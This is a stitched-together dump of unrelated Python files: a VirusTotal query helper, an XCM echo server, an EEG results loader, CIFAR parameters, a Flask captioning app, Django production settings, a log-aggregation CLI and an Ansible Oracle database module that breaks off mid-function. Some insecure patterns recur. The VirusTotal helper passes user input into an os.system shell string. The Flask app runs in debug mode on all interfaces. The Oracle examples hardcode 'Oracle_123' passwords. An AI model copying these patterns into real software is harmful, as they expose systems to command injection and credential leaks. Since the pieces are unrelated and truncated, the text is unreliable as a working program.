#print("To synoliko plithos twn sos einai:", pl_sos)
mo = pl_sos / 100
print("O mesos oros olwn twn sos einai:", mo) |
import os, getpass
from decouple import config
from .hashes import *
## querying the virus total using virustotal-search.py and api
def query_virusTotal():
## getting the hash code of the file of choice
hashcode = get_hashCode()
path = os.path.dirname(__file__)
api = input("Whats your API key? ")
## validation to check if the key is there
if(api == ""):
api = config('vtkey')
username = getpass.getuser()
## calling the query
query = f"python {path}/virustotal-search.py -k " + api + " -m " + hashcode
os.system(query)
## getting the hashcode using the previous challenge
def get_hashCode():
target_file = input("whats the target file? ")
target_file = os.path.abspath(target_file)
return hash_co(target_file) |
#!/usr/bin/python3
#
# echod.py -- a simple Python-based XCM echo server.
#
# This program is meant as an example how you can use XCM in
# non-blocking mode from Python.
#
import xcm
import sys
import errno
import asyncio
class Client:
def __init__(self, event_loop, conn_sock):
self.conn_sock = conn_sock
conn_sock.set_target(xcm.SO_RECEIVABLE)
self.msg = None
self.event_loop = event_loop
self.event_loop.add_reader(conn_sock, self.activate)
def activate(self):
try:
if self.msg:
self.conn_sock.send(self.msg)
self.msg = None
else:
self.msg = self.conn_sock.receive()
if len(self.msg) == 0:
self.terminate()
except xcm.error as e:
if e.errno != errno.EAGAIN:
self.terminate()
finally:
if self.conn_sock != None:
self.conn_sock.set_target(self.condition())
def condition(self):
if self.msg:
return xcm.SO_SENDABLE
else:
return xcm.SO_RECEIVABLE
def terminate(self):
self.event_loop.remove_reader(self.conn_sock)
self.conn_sock.close()
self.conn_sock = None
class EchoServer:
def __init__(self, event_loop, addr):
self.event_loop = event_loop
self.sock = xcm.server(addr, attrs={"xcm.blocking": False})
self.sock.set_target(xcm.SO_ACCEPTABLE)
self.event_loop.add_reader(self.sock, self.activate)
def activate(self):
try:
conn_sock = self.sock.accept(attrs={"xcm.blocking": False})
Client(self.event_loop, conn_sock)
except xcm.error as e:
if e.errno != errno.EAGAIN:
raise e
def run(addr):
event_loop = asyncio.get_event_loop()
server = EchoServer(event_loop, addr)
event_loop.run_forever()
if __name__ == '__main__':
if len(sys.argv) != 2:
print("Usage: %s <addr>" % sys.argv[0])
sys.exit(1)
run(sys.argv[1])
|
import os
import warnings
from cortstim.edp.loaders.dataset.clinical.excel_meta import ExcelReader
from cortstim.edp.loaders.dataset.result.resultloader import ResultLoader
from cortstim.edp.loaders.patient.subjectbase import SubjectBase
class SubjectResultsLoader(SubjectBase):
"""
Patient level wrapper for loading in data, or result. It helps
load in all the datasets for a particular subject, for doing per-subject analysis.
Assumes directory structure:
root_dir
-> name
-> datasets / result_computes
"""
def __init__(self, root_dir,
subjid=None,
datatype='frag',
preload=True,
use_excel_meta=False):
# if datatype not in MODELDATATYPES:
# raise ValueError("Type of subject loader must be one of {}. You passed in {}!".format(MODELDATATYPES, type))
super(SubjectResultsLoader, self).__init__(
root_dir=root_dir, subjid=subjid, datatype=datatype)
self.use_excel_meta = use_excel_meta
# set reference for this recording and jsonfilepath
self.loadingfunc = ResultLoader
self.datatype = datatype
# get a list of all the jsonfilepaths possible
self._getalljsonfilepaths(self.root_dir, subjid=subjid)
print("Found {} jsonfilepaths for {}".format(
len(self.jsonfilepaths), self.subjid))
if preload:
self.read_all_files()
def read_all_files(self):
if not self.is_loaded:
# load in each file / dataset separately
for idx, json_file in enumerate(self.jsonfilepaths):
jsonfilepath = os.path.join(self.root_dir, json_file)
if not os.path.exists(self._get_corresponding_npzfile(jsonfilepath)):
print("Data file for {} does not exist!".format(jsonfilepath))
continue
result = self.loadingfunc(results_dir=self.root_dir,
jsonfilepath=jsonfilepath,
datatype=self.datatype,
preload=False)
resultmodel = result.loadpipeline(jsonfilepath=jsonfilepath)
if resultmodel.onsetwin == resultmodel.offsetwin:
warnings.warn(
"Result model onsetwin == offsetwin in {}".format(jsonfilepath))
continue
if self.use_excel_meta:
print(
"TODO: REFORMAT THIS FUNCTION. Bringing in excel data for onsetchans")
resultmodel.clinonsetlabels = self.load_onsetchans_fromexcel(
resultmodel.patient_id)
# create data structures of the results
self.datasets.append(resultmodel)
self.dataset_ids.append(resultmodel.dataset_id)
else:
raise RuntimeError(
"Datasets for this patient are already loaded! Need to run reset() first!")
def trim_datasets(self, resultmodel, offset_sec):
resultmodel.trim_aroundonset(offset_sec=offset_sec)
data = resultmodel.get_data()
metadata = resultmodel.get_data()
return data, metadata
def load_onsetchans_fromexcel(self, patid):
datafile = os.path.join(
"/Users/adam2392/Dropbox/phd research/Fragility Analysis Project/datasheet_manual_notes.xlsx")
dropboxdir = "/Users/adam2392/Dropbox/phd_research/Fragility_Analysis_Project/"
alldatafile = os.path.join(
dropboxdir, "organized_clinical_datasheet_formatted.xlsx")
from ast import literal_eval
sheetreader = ExcelReader(alldatafile)
df = sheetreader.df
ezcontacts = df[df['patid'] == patid]['ez_hypo_contacts'].values[0]
ezcontacts = literal_eval(ezcontacts)
return ezcontacts
|
# -*- coding: utf-8 -*-
"""This file contains all model parameters"""
# Specify Model to be trained
input_file = "Models/Inputs/cifar10_input.py"
network_file = "Models/Networks/cnn2_2.py"
opt_file = "Models/Optimizer/adam.py"
# Optionally: Where to download data
data_url = 'http://www.cs.toronto.edu/~kriz/cifar-10-binary.tar.gz'
# Data Params
crop_size = 32
image_size = 24
num_classes = 10
num_channels = 3
num_examples_per_epoch_for_train = 50000
num_examples_per_epoch_for_eval = 10000
# Train Params
batch_size = 128
max_steps = 200000 # Number of steps to run trainer.
learning_rate = 0.01 # Learning rate |
import os
import requests
from flask import Flask, render_template, request, jsonify
import tensorflow as tf
from config import Config
from model import CaptionGenerator
from dataset import prepare_train_data, prepare_eval_data, prepare_test_data
app = Flask(__name__)
def download_file_from_google_drive(destination):
URL = "https://public.boxcloud.com/d/1/b1!cThk862sN_mEYixwOAB-XR03H6HSHl7Of1enrson40a0Q86bGizmxgtAP9Rvg6uEIJb0cR43HGRb53_FCEFBUhJt0GG8hksOO-2Cqx-PN-CIm_c7LLvlVmbLDQrGPG2ck9GKmp19vm-2UqSKCPYL2K_zcBmP9h6SECnzGusb3VP0tSB_qgSkIhtE3TeVei3A1_jb4y9fPSHXBR1awbfELQlF8gZu9ElRgID_6zaA2yhAMrA59xHztdK1BKKW9BWUC5QqeHo3xewgXo-E_Cms5sYyM4aYeKd9cUFRGiEW41YNWHybCpRlxFJpYrikC72M_AsN-gC2CfPIvFpgE21cJFqA_vQYHO26L4QmvsYr0RMUzbTrWhO9c_I07ZTssV8InN-LwZNHAcj8prpPWovbR_pRX4OvB1eJalINAt4R8ZzLEdaenylhICK86Pi7-piEaiFbjE81LPu23NNHSO1BBDk8s2H_euMNxp5_agYQ5ee44hakye_CTRI8hGXzWG4EJdldOd_EmIjIIYNweFjtyFz_ye3koss24ZhfWOEEfkyrWAEBGQd5A_Q-to9dX6qr58vXfCCD0utjYG2UR3x6OOKh--YhrQ-O7umY42n-A90XToFYQj-LJIYD98BKe2ylLR2F8PwiF6kl_2zxoGHd8Ckzm-CSnZ_xviPPAAl4A__d0Bz5tKQil2woFFD0wkEfquSdqBt4WJIHbT8LX3GuB5fUGpqQnX3Dj2d-cJGmluTisQNisj1zQ0pCAnzQQMAWgpiH7T1biaGSGebXSegV3-rWWJVj6o8GO6hSaTMCErR_dPVAmrmqlNsg23FOv3u27Dl4jnKWHv-ZowWTsh8Y5JpFDQW2-09wmgdnpAvHeUbgRTdSgQn2uFJB4HQOQaM6YjcAHPFvpgKcgckS17ldzuQQK4rw6__rxh3Lw0nY5NX5ge-KdkWaq_yCoqsPxCv7QISXvHIeF07uEBNEOm9Q0VKlsqflUz69Vlsp0sM1tgdpCEu0tfC-avubD17pxUrQhvVA47NSC52AMsBIZG8RR6ql1Z0HXr2xtYgYUE3KonAY-ANLkPTubjem-P2z7p-PARJHrKqu97--zPgdiERQSzMmgCCCOHYBFeYbIeXmb9-TNTlbcsuCS8_NDC18jvBcvTpeoUkiTnHfVV8M9wyaMbZJwVaj2NXT0LdzfPvcIJkwHgtNk0zcz_oFdRZwj76emYd_9vXYqMkggvU0yXrkfRnQjVO0DsCK248k36CccSyWJOcaollzIdid3ivu4FMMAgCdF8E./download"
session = requests.Session()
response = session.get(URL, stream = True)
save_response_content(response, destination)
def save_response_content(response, destination):
CHUNK_SIZE = 32768
with open(destination, "wb") as f:
for chunk in response.iter_content(CHUNK_SIZE):
if chunk: # filter out keep-alive new chunks
f.write(chunk)
def setup_model():
destination = 'models/model.npy'
if not os.path.exists(destination):
download_file_from_google_drive(destination)
# setup_model()
config = Config()
config.beam_size = 3
config.phase = 'test'
config.train_cnn = False
sess = tf.Session()
model = CaptionGenerator(config)
model.load(sess)
tf.get_default_graph().finalize()
@app.route('/')
def index():
return render_template('index.html')
@app.route('/analyze', methods=['POST'])
def analyze():
f = request.files['file']
f.save(os.path.join('./test/images', f.filename))
data, vocabulary = prepare_test_data(config)
captions = model.test(sess, data, vocabulary)
os.remove(os.path.join('./test/images', f.filename))
return jsonify({'result': captions[0]})
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80, debug=True)
|
"""Overwrite settings with production settings when going live."""
from .settings_base import *
import os
import logging.config
# Do not set SECRET_KEY, Postgres or LDAP password or any other sensitive data here.
# Instead, use environment variables or create a local.py file on the server.
# Disable debug mode
DEBUG = False
TEMPLATES[0]['OPTIONS']['debug'] = False
# Configuration from environment variables
# Alternatively, you can set these in a local.py file on the server
env = os.environ.copy()
# Basic configuration
# APP_NAME = env.get('APP_NAME', 'wagtailvue')
if 'SECRET_KEY' in env:
SECRET_KEY = env['SECRET_KEY']
if 'ALLOWED_HOSTS' in env:
ALLOWED_HOSTS = env['ALLOWED_HOSTS'].split(',')
if 'PRIMARY_HOST' in env:
BASE_URL = 'http://%s/' % env['PRIMARY_HOST']
if 'SERVER_EMAIL' in env:
SERVER_EMAIL = env['SERVER_EMAIL']
if 'CACHE_PURGE_URL' in env:
INSTALLED_APPS += ( 'wagtail.contrib.frontend_cache', )
WAGTAILFRONTENDCACHE = {
'default': {
'BACKEND': 'wagtail.contrib.frontend_cache.backends.HTTPBackend',
'LOCATION': env['CACHE_PURGE_URL'],
},
}
# Email via ESP
if 'MAILGUN_KEY' in os.environ:
EMAIL_BACKEND = "anymail.backends.mailgun.EmailBackend"
ANYMAIL = {
"MAILGUN_API_KEY": env['MAILGUN_KEY'],
"MAILGUN_SENDER_DOMAIN": env['MAILGUN_DOMAIN']
}
DEFAULT_FROM_EMAIL = env['MAILGUN_FROM']
# Redis location can either be passed through with REDIS_HOST or REDIS_SOCKET
if 'REDIS_URL' in env:
REDIS_LOCATION = env['REDIS_URL']
BROKER_URL = env['REDIS_URL']
elif 'REDIS_HOST' in env:
REDIS_LOCATION = env['REDIS_HOST']
BROKER_URL = 'redis://%s' % env['REDIS_HOST']
elif 'REDIS_SOCKET' in env:
REDIS_LOCATION = 'unix://%s' % env['REDIS_SOCKET']
BROKER_URL = 'redis+socket://%s' % env['REDIS_SOCKET']
else:
REDIS_LOCATION = None
if REDIS_LOCATION is not None:
CACHES = {
'default': {
'BACKEND': 'django_redis.cache.RedisCache',
'LOCATION': REDIS_LOCATION,
'KEY_PREFIX': APP_NAME,
'OPTIONS': {
'CLIENT_CLASS': 'django_redis.client.DefaultClient',
}
}
}
# Use Elasticsearch as the search backend for extra performance and better search results
if 'ELASTICSEARCH_URL' in env:
WAGTAILSEARCH_BACKENDS = {
'default': {
'BACKEND': 'wagtail.search.backends.elasticsearch5',
'URLS': [env['ELASTICSEARCH_URL']],
'INDEX': APP_NAME,
'ATOMIC_REBUILD': True,
},
}
# Logging Configuration
# Clear prev config
LOGGING_CONFIG = None
# Get loglevel from env
LOGLEVEL = os.getenv('DJANGO_LOGLEVEL', 'info').upper()
logging.config.dictConfig({
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'console': {
'format': '%(asctime)s %(levelname)s [%(name)s:%(lineno)s] %(module)s %(process)d %(thread)d %(message)s',
},
},
'handlers': {
'console': {
'class': 'logging.StreamHandler',
'formatter': 'console',
},
},
'loggers': {
'': {
'level': LOGLEVEL,
'handlers': ['console',],
},
},
})
try:
from .local import *
except ImportError:
pass
|
# import file(s)
from . import pca
# pca model
from .pca import PCA
|
from nsq.reader import Reader
from basescript import BaseScript
from logagg.collector import LogCollector
from logagg.forwarder import LogForwarder
from logagg.nsqsender import NSQSender
from logagg import util
class LogaggCommand(BaseScript):
DESC = "Logagg command line tool"
def collect(self):
if not self.args.nsqd_http_address:
nsq_sender = util.DUMMY
else:
nsq_sender = NSQSender(
self.args.nsqd_http_address,
self.args.nsqtopic,
self.args.depth_limit_at_nsq,
self.log,
)
collector = LogCollector(
self.args.file, self.args.heartbeat_interval, nsq_sender, self.log
)
collector.start()
def _parse_forwarder_target_arg(self, t):
path, args = t.split(":", 1)
path = path.split("=")[1]
args = dict(a.split("=", 1) for a in args.split(":"))
args["log"] = self.log
return path, args
def forward(self):
targets = []
for t in self.args.target:
imp_path, args = self._parse_forwarder_target_arg(t)
target_class = util.load_object(imp_path)
target_obj = target_class(**args)
targets.append(target_obj)
nsq_receiver = Reader(
topic=self.args.nsqtopic,
channel=self.args.nsqchannel,
nsqd_tcp_addresses=[self.args.nsqd_tcp_address],
max_in_flight=2500,
)
forwarder = LogForwarder(nsq_receiver, targets, self.log)
forwarder.start()
def define_subcommands(self, subcommands):
super(LogaggCommand, self).define_subcommands(subcommands)
collect_cmd = subcommands.add_parser(
"collect",
help="Collects the logs from \
different processes and sends to nsq",
)
collect_cmd.set_defaults(func=self.collect)
collect_cmd.add_argument(
"--file",
nargs="+",
help="Provide absolute path of logfile \
including module name and function name,"
"format: file=<filename>:formatter=<formatter function>,"
"eg: file=/var/log/nginx/access.log:formatter=logagg.formatters.nginx_access",
)
collect_cmd.add_argument(
"--nsqtopic",
nargs="?",
default="test_topic",
help="Topic name to publish messages. Ex: logs_and_metrics",
)
collect_cmd.add_argument(
"--nsqd-http-address",
nargs="?",
help="nsqd http address where we send the messages, eg. localhost:4151",
)
collect_cmd.add_argument(
"--depth-limit-at-nsq",
type=int,
default=10000000,
help="To limit the depth at nsq topic",
)
collect_cmd.add_argument(
"--heartbeat-interval",
type=int,
default=30,
help='Time interval at which regular heartbeats to a nsqTopic \
"heartbeat" to know which hosts are running logagg',
)
forward_cmd = subcommands.add_parser(
"forward",
help="Collects all the messages\
from nsq and pushes to storage engine",
)
forward_cmd.set_defaults(func=self.forward)
forward_cmd.add_argument(
"--nsqtopic",
help="NSQ topic name to read messages from. Ex: logs_and_metrics",
)
forward_cmd.add_argument(
"--nsqchannel",
help="NSQ channel name to read messages from. Ex: logs_and_metrics",
)
forward_cmd.add_argument(
"--nsqd-tcp-address",
default="localhost:4150",
help="nsqd tcp address where we get the messages",
)
forward_cmd.add_argument(
"-t",
"--target",
nargs="+",
help="Target database and database details,"
'format: "forwarder=<forwarder-classpath>:host=<hostname>:port=<port-number>:user=<user-name>:password=<password>:db=<database-name>:collection=<collection-name>",'
"Ex: forwarder=logagg.forwarders.MongoDBForwarder:host=localhost:port=27017:user=some_user:password=xxxxx:db=logagg:collection=cluster_logs_and_metrics",
)
def main():
LogaggCommand().start()
if __name__ == "__main__":
main()
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
from __future__ import absolute_import, division, print_function
__metaclass__ = type
from ansible.module_utils.basic import AnsibleModule, os, re, subprocess, time
try:
import cx_Oracle
except ImportError:
cx_oracle_exists = False
else:
cx_oracle_exists = True
DOCUMENTATION = '''
---
module: oracle_db
short_description: Manage an Oracle database
description:
- Create/delete a database using dbca
- If a responsefile is available, that will be used.
If initparams is defined, those will be attached to the createDatabase command
- If no responsefile is created, the database will be created based on all other parameters
version_added: "0.8.0"
options:
oracle_home:
description:
- The home where the database will be created
required: False
aliases: ['oh']
db_name:
description:
- The name of the database
required: True
default: None
aliases: ['db','database_name','name']
sid:
description:
- The instance name
required: False
default: None
db_unique_name:
description:
- The database db_unique_name
required: False
default: None
aliases: ['dbunqn','unique_name']
sys_password:
description:
- Password for the sys user
required: False
default: None
aliases: ['syspw','sysdbapassword','sysdbapw']
system_password:
description:
- Password for the system user
- If not set, defaults to sys_password
required: False
default: None
aliases: ['systempw']
dbsnmp_password:
description:
- Password for the dbsnmp user
- If not set, defaults to sys_password
required: False
default: None
aliases: ['dbsnmppw']
responsefile:
description:
- The name of responsefile
required: True
default: None
template:
description:
- The template the database will be based off
required: False
default: General_Purpose.dbc
cdb:
description:
- Should the database be a container database
required: False
default: False
aliases: ['container']
choices: ['True','False']
datafile_dest:
description:
- Where the database files should be placed (ASM diskgroup or filesystem path)
required: False
default: False
aliases: ['dfd']
recoveryfile_dest:
description:
- Where the database files should be placed (ASM diskgroup or filesystem path)
required: False
default: False
aliases: ['rfd']
storage_type:
description:
- Type of underlying storage (Filesystem or ASM)
required: False
default: FS
aliases: ['storage']
choices: ['FS','ASM']
dbconfig_type:
description:
- Type of database (SI,RAC,RON)
required: False
default: SI
choices: ['SI','RAC','RACONENODE']
db_type:
description:
- Default Type of database (MULTIPURPOSE, OLTP, DATA_WAREHOUSING)
required: False
default: MULTIPURPOSE
choices: ['MULTIPURPOSE','OLTP','DATA_WAREHOUSING']
racone_service:
description:
- If dbconfig_type = RACONENODE, a service has to be created along with the DB. This is the name of that service
- If no name is defined, the service will be called "{{ db_name }}_ronserv"
required: False
default: None
aliases: ['ron_service']
characterset:
description:
- The database characterset
required: False
default: AL32UTF8
memory_percentage:
description:
- The database total memory in % of available memory
required: False
memory_totalmb:
description:
- The database total memory in MB. Defaults to 1G
required: False
default: ['1024']
nodelist:
description:
- The list of nodes a RAC DB should be created on
required: False
amm:
description:
- Should Automatic Memory Management be used (memory_target, memory_max_target)
required: False
Default: False
choices: ['True','False']
initparams:
description:
- List of key=value pairs
- e.g
- "init_params:"
- " - sga_target=1G"
- " - sga_max_size=1G"
required: False
customscripts:
description:
- List of scripts to run after database is created
- e.g
- "customScripts:"
- " - /tmp/xxx.sql"
- " - /tmp/yyy.sql"
required: False
default_tablespace_type:
description:
- Database default tablespace type (DEFAULT_TBS_TYPE)
default: smallfile
choices: ['smallfile','bigfile']
default_tablespace:
description:
- Database default tablespace
default: smallfile
required: False
default_temp_tablespace:
description:
- Database default temporary tablespace
required: False
archivelog:
description:
- Puts the database is archivelog mode
required: False
default: false
choices: ['True','False']
type: bool
force_logging:
description:
- Enables force logging for the Database
required: False
default: false
choices: ['True','False']
type: bool
flashback:
description:
- Enables flashback for the database
required: False
default: false
choices: ['True','False']
type: bool
state:
description:
- The intended state of the database
default: present
choices: ['present','absent']
hostname:
description:
- The host of the database if using dbms_service
required: false
default: localhost
aliases: ['host']
port:
description:
- The listener port to connect to the database if using dbms_service
required: false
default: 1521
notes:
- cx_Oracle needs to be installed
requirements: [ "cx_Oracle" ]
author: Mikael Sandström, oravirt@gmail.com, @oravirt
'''
EXAMPLES = '''
- name: Create a DB (non-cdb)
oracle_db:
oh: /u01/app/oracle/12.2.0.1/db1
db_name: orclcdb
syspw: Oracle_123
state: present
storage: ASM
dfd: +DATA
rfd: +DATA
default_tablespace_type: bigfile
- hosts: all
gather_facts: true
vars:
oracle_home: /u01/app/oracle/12.2.0.1/db1
dbname: orclcdb
dbunqname: "{{ dbname}}_unq"
container: True
dbsid: "{{ dbname }}"
hostname: "{{ ansible_hostname }}"
oracle_env:
ORACLE_HOME: "{{ oracle_home }}"
LD_LIBRARY_PATH: "{{ oracle_home }}/lib"
myaction: present
rspfile: "/tmp/dbca_{{dbname}}.rsp"
initparameters:
- memory_target=0
- memory_max_target=0
- sga_target=1500M
- sga_max_size=1500M
dfd: +DATA
rfd: +FRA
storage: ASM
dbtype: SI
#ron_service: my_ron_service
#clnodes: racnode-dc1-1,racnode-dc1-2
tasks:
- name: Manage database
oracle_db:
service_name={{ dbname }}
hostname={{ hostname}}
user=sys
password=Oracle_123
state={{ myaction }}
db_name={{ dbname }}
sid={{ dbsid |default(omit)}}
db_unique_name={{ dbunqname |default(omit) }}
sys_password=Oracle_123
system_password=Oracle_123
responsefile={{ rspfile |default(omit) }}
cdb={{ container |default (omit)}}
initparams={{ initparameters |default(omit)}}
datafile_dest={{ dfd }}
recoveryfile_dest={{rfd}}
storage_type={{storage}}
dbconfig_type={{dbtype}}
racone_service={{ ron_service|default(omit)}}
amm=False
memory_totalmb=1024
nodelist={{ clnodes |default(omit) }}
environment: "{{ oracle_env }}"
run_once: True
'''
global gimanaged
global major_version
global user
global password
global service_name
global hostname
global port
global israc
global newdb
global output
global verbosemsg
global verboselist
def get_version(module, oracle_home):
command = '%s/bin/sqlplus -V' % oracle_home
(rc, stdout, stderr) = module.run_command(command)
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
module.fail_json(msg=msg, changed=False)
else:
return stdout.split(' ')[2][0:4]
# Check if the database exists
def check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
if sid is None:
sid = ''
if gimanaged:
if db_unique_name is not None:
checkdb = db_unique_name
else:
checkdb = db_name
command = "%s/bin/srvctl config database -d %s " % (oracle_home, checkdb)
(rc, stdout, stderr) = module.run_command(command)
if rc != 0:
if 'PRCD-1229' in stdout: # <-- DB is created, but with a different ORACLE_HOME
msg = 'Database %s already exists in a different home. Stdout -> %s' % (db_name, stdout)
module.fail_json(msg=msg, changed=False)
elif '%s' % db_name in stdout: # <-- db doesn't exist
return False
else:
return False
elif 'Database name: %s' % db_name in stdout: # <-- Database already exist
return True
else:
return True
else:
existingdbs = []
oratabfile = '/etc/oratab'
if os.path.exists(oratabfile):
with open(oratabfile) as oratab:
for line in oratab:
if line.startswith('#') or line.startswith(' '):
continue
elif re.search(db_name + ':', line) or re.search(sid + ':', line):
existingdbs.append(line)
if not existingdbs: # <-- db doesn't exist
return False
else:
for dbs in existingdbs:
if sid != '':
if '%s:' % db_name in dbs or '%s:' % sid in dbs:
if dbs.split(':')[1] != oracle_home.rstrip(
'/'): # <-- DB is created, but with a different ORACLE_HOME
msg = 'Database %s already exists in a different ORACLE_HOME (%s)' % (
db_name, dbs.split(':')[1])
module.fail_json(msg=msg, changed=False)
elif dbs.split(':')[1] == oracle_home.rstrip('/'): # <-- Database already exist
return True
else:
if '%s:' % db_name in dbs:
if dbs.split(':')[1] != oracle_home.rstrip(
'/'): # <-- DB is created, but with a different ORACLE_HOME
msg = 'Database %s already exists in a different ORACLE_HOME (%s)' % (
db_name, dbs.split(':')[1])
module.fail_json(msg=msg, changed=False)
elif dbs.split(':')[1] == oracle_home.rstrip('/'): # <-- Database already exist
return True
def create_db(module, oracle_home, sys_password, system_password, dbsnmp_password, db_name, sid, db_unique_name,
responsefile, template, cdb,
local_undo, datafile_dest, recoveryfile_dest, storage_type, dbconfig_type, racone_service, characterset,
memory_percentage, memory_totalmb,
nodelist, db_type, amm, initparams, customscripts):
initparam = '-initParams '
paramslist = ''
command = "%s/bin/dbca -createDatabase -silent " % oracle_home
if responsefile is not None:
if os.path.exists(responsefile):
command += ' -responseFile %s ' % responsefile
else:
msg = 'Responsefile %s doesn\'t exist' % responsefile
module.fail_json(msg=msg, changed=False)
if db_unique_name is not None:
initparam += 'db_name=%s,db_unique_name=%s,' % (db_name, db_unique_name)
if initparams is not None:
paramslist = ",".join(initparams)
initparam += '%s' % paramslist
else:
command += ' -gdbName %s' % db_name
if sid is not None:
command += ' -sid %s' % sid
if sys_password is not None:
command += ' -sysPassword %s' % sys_password
if system_password is not None:
command += ' -systemPassword %s' % system_password
else:
system_password = sys_password
command += ' -systemPassword %s' % system_password
if dbsnmp_password is not None:
command += ' -dbsnmpPassword %s' % dbsnmp_password
else:
dbsnmp_password = sys_password
command += ' -dbsnmpPassword %s' % dbsnmp_password
if template:
command += ' -templateName %s' % template
if major_version > '11.2':
if cdb:
command += ' -createAsContainerDatabase true '
if local_undo:
command += ' -useLocalUndoForPDBs true'
else:
command += ' -useLocalUndoForPDBs false'
else:
command += ' -createAsContainerDatabase false '
if datafile_dest is not None:
command += ' -datafileDestination %s ' % datafile_dest
if recoveryfile_dest is not None:
command += ' -recoveryAreaDestination %s ' % recoveryfile_dest
if storage_type is not None:
command += ' -storageType %s ' % storage_type
if dbconfig_type is not None:
if dbconfig_type == 'SI':
dbconfig_type = 'SINGLE'
if major_version == '12.2':
command += ' -databaseConfigType %s ' % dbconfig_type
elif major_version == '12.1':
command += ' -databaseConfType %s ' % dbconfig_type
if dbconfig_type == 'RACONENODE':
if racone_service is None:
racone_service = db_name + '_ronserv'
command += ' -RACOneNodeServiceName %s ' % racone_service
if characterset is not None:
command += ' -characterSet %s ' % characterset
if memory_percentage is not None:
command += ' -memoryPercentage %s ' % memory_percentage
if memory_totalmb is not None:
command += ' -totalMemory %s ' % memory_totalmb
if dbconfig_type == 'RAC':
if nodelist is not None:
nodelist = ",".join(nodelist)
command += ' -nodelist %s ' % nodelist
if db_type is not None:
command += ' -databaseType %s ' % db_type
if amm is not None:
if major_version == '12.2':
if amm:
command += ' -memoryMgmtType AUTO '
else:
command += ' -memoryMgmtType AUTO_SGA '
elif major_version == '12.1':
command += ' -automaticMemoryManagement %s ' % (str(amm).lower())
elif major_version == '11.2':
if amm:
command += ' -automaticMemoryManagement '
if customscripts is not None:
scriptlist = ",".join(customscripts)
command += ' -customScripts %s ' % scriptlist
if db_unique_name is not None:
initparam += 'db_name=%s,db_unique_name=%s,' % (db_name, db_unique_name)
if initparams is not None:
paramslist = ",".join(initparams)
initparam += ' %s' % paramslist
if initparam != '-initParams ' or paramslist != "":
command += initparam
(rc, stdout, stderr) = module.run_command(command)
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
module.fail_json(msg=msg, changed=False)
else:
if output == 'short':
return True
else:
verboselist.append('STDOUT: %s, COMMAND: %s' % (stdout, command))
return True, verboselist
def remove_db(module, msg, oracle_home, db_name, sid, db_unique_name, sys_password):
cursor = getconn(module)
israc_sql = 'select parallel,instance_name,host_name from v$instance'
israc_ = execute_sql_get(module, cursor, israc_sql)
if gimanaged:
if db_unique_name is not None:
remove_db = db_unique_name
elif sid is not None and israc_[0][0] == 'YES':
remove_db = db_name
elif sid is not None and israc_[0][0] == 'NO':
remove_db = sid
else:
remove_db = db_name
else:
if sid is not None:
remove_db = sid
else:
remove_db = db_name
command = "%s/bin/dbca -deleteDatabase -silent -sourceDB %s -sysDBAUserName sys -sysDBAPassword %s" % (
oracle_home, remove_db, sys_password)
(rc, stdout, stderr) = module.run_command(command)
if rc != 0:
msg = 'Removal of database %s failed: %s' % (db_name, stdout)
module.fail_json(msg=msg, changed=False)
else:
if output == 'short':
return True
else:
msg = 'STDOUT: %s, COMMAND: %s' % (stdout, command)
module.exit_json(msg=msg, changed=True)
def ensure_db_state(module, oracle_home, db_name, db_unique_name, sid, archivelog, force_logging, flashback,
default_tablespace_type, default_tablespace, default_temp_tablespace):
global israc
cursor = getconn(module)
alterdb_sql = 'alter database'
propsql = "select lower(property_value) from database_properties" \
" where property_name in ('DEFAULT_TBS_TYPE','DEFAULT_PERMANENT_TABLESPACE','DEFAULT_TEMP_TABLESPACE')" \
" order by 1"
def_tbs_type, def_tbs, def_temp_tbs = execute_sql_get(module, cursor, propsql)
israc_sql = 'select parallel,instance_name,host_name from v$instance'
israc_ = execute_sql_get(module, cursor, israc_sql)
instance_name = israc_[0][1]
change_restart_sql = []
change_db_sql = []
log_check_sql = 'select log_mode,force_logging, flashback_on from v$database'
log_check_ = execute_sql_get(module, cursor, log_check_sql)
if israc_[0][0] == 'NO':
israc = False
else:
israc = True
if archivelog:
archcomp = 'ARCHIVELOG'
archsql = alterdb_sql + ' archivelog'
else:
archcomp = 'NOARCHIVELOG'
archsql = alterdb_sql + ' noarchivelog'
if force_logging:
flcomp = 'YES'
flsql = alterdb_sql + ' force logging'
else:
flcomp = 'NO'
flsql = alterdb_sql + ' no force logging'
if flashback:
fbcomp = 'YES'
fbsql = alterdb_sql + ' flashback on'
else:
fbcomp = 'NO'
fbsql = alterdb_sql + ' flashback off'
if def_tbs_type[0] != default_tablespace_type:
deftbstypesql = 'alter database set default %s tablespace ' % default_tablespace_type
change_db_sql.append(deftbstypesql)
if default_tablespace is not None and def_tbs[0] != default_tablespace:
deftbssql = 'alter database default tablespace %s' % default_tablespace
change_db_sql.append(deftbssql)
if default_temp_tablespace is not None and def_temp_tbs[0] != default_temp_tablespace:
deftempsql = 'alter database default temporary tablespace %s' % default_temp_tablespace
change_db_sql.append(deftempsql)
if log_check_[0][0] != archcomp:
change_restart_sql.append(archsql)
if log_check_[0][1] != flcomp:
change_db_sql.append(flsql)
if log_check_[0][2] != fbcomp:
change_db_sql.append(fbsql)
if len(change_db_sql) > 0 or len(change_restart_sql) > 0:
# Flashback database needs to be turned off before archivelog is turned off
if log_check_[0][0] == 'ARCHIVELOG' and log_check_[0][2] == 'YES' and not archivelog and not flashback:
if len(change_db_sql) > 0: # <- Apply changes that does not require a restart
apply_norestart_changes(module, change_db_sql)
if len(change_restart_sql) > 0: # <- Apply changes that requires a restart
apply_restart_changes(module, oracle_home, db_name, db_unique_name, sid, instance_name, israc, archcomp,
change_restart_sql)
else:
if len(change_restart_sql) > 0: # <- Apply changes that requires a restart
apply_restart_changes(module, oracle_home, db_name, db_unique_name, sid, instance_name, israc, archcomp,
change_restart_sql)
if len(change_db_sql) > 0: # <- Apply changes that does not require a restart
apply_norestart_changes(module, change_db_sql)
msg = 'Database %s has been put in the intended state - Archivelog: %s, Force Logging: %s, Flashback: %s' % (
db_name, archivelog, force_logging, flashback)
module.exit_json(msg=msg, changed=True)
else:
if newdb:
msg = 'Database %s successfully created created (%s) ' % (db_name, archcomp)
if output == 'verbose':
msg += ' ,'.join(verboselist)
changed = True
else:
